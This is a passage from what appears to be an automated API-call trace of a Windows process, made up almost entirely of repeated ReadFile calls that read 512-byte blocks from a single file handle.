lpOverlapped=0x0) returned 1 [0212.823] _get_osfhandle (_FileHandle=1) returned 0x50 [0212.823] GetFileType (hFile=0x50) returned 0x1 [0212.823] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.824] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.825] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.826] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile 
(in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.827] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 
[0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.828] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, 
lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, 
lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.829] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: 
lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.830] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, 
lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.831] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.832] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, 
lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, lpNumberOfBytesRead=0x2edf54*=0x200, lpOverlapped=0x0) returned 1 [0212.833] ReadFile (in: hFile=0x58, lpBuffer=0x2eed64, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2edf54, lpOverlapped=0x0 | out: lpBuffer=0x2eed64*, 